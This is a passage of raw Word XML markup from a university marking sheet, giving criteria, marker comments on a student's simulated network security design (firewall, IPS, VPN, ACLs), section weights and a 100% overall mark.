          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="42622570" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:trHeight w:val="451"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6DB4FDC6" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>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53789056" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">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3461360" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:sz w:val="32"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="23036C46" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="4A43122D" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">3. </w:t>
            </w:r>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Analysis</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A1D360C" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>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DAF1AD7" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">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1A57196" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:sz w:val="32"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="271ACC1E" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="555D78AB" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>You have explain resources, devices used for your chosen design and critically analysis your chosen solution.  You have discussed your simulation design, packet tracer implementation and simulation attacks beyond what was expected. Excellent conclusions with recommendations.   (Grade mark: 100.00%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7DEB1DA5" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>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FDD47DD" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="6114701A" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:trHeight w:val="451"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4A1564C7" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>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31C803E1" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">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149A38E" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:sz w:val="32"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="53727459" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="681D7667" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">4. </w:t>
            </w:r>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Practical Application and Deployment</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D5428E8" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>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0B21DCE" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">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C2E334A" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:sz w:val="32"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="504DA021" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:trHeight w:val="451"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="68E66BB2" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>A comprehensive implementation with excellent use of the crypto configuration. Highly secured measures implemented such as firewall, IPS, VPN, ACLs, etc. considered.  Could be implement in a real world environment.  (Grade mark: 100.00%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6ABE850C" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:lang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2A030117" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>60</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="3C08C2DF" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4D04E47C" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>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4FBE425C" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">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104B10B" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:sz w:val="32"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="5A41FC90" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="3728B09D" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">5. </w:t>
            </w:r>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Skills for Professional Practice</w:t>
            </w:r>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F0C5B71" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>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81CC0D1" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">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21DBF55" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:sz w:val="32"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="2A8A2DF1" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:trHeight w:val="451"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3083149A" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2FBA2E30" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>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148AC3E7" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="12FE2D77" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="121132CC" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="38D67116" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">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5BD1C95" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C22DD96" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
      <w:pPr>
        <w:ind w:left="284" w:right="533"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>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2010EA" w:rsidRPr="002010EA" w14:paraId="5E30212C" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6062" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="pct15" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="209B958A" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">Assignment Mark </w:t>
            </w:r>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>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BC4A501" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Late Submission Penalties (tick if appropriate)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11FAD0FC" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>100%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="3107C78F" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6062" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="777575B7" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2903" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="7031DA6C" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Up to four weeks late</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
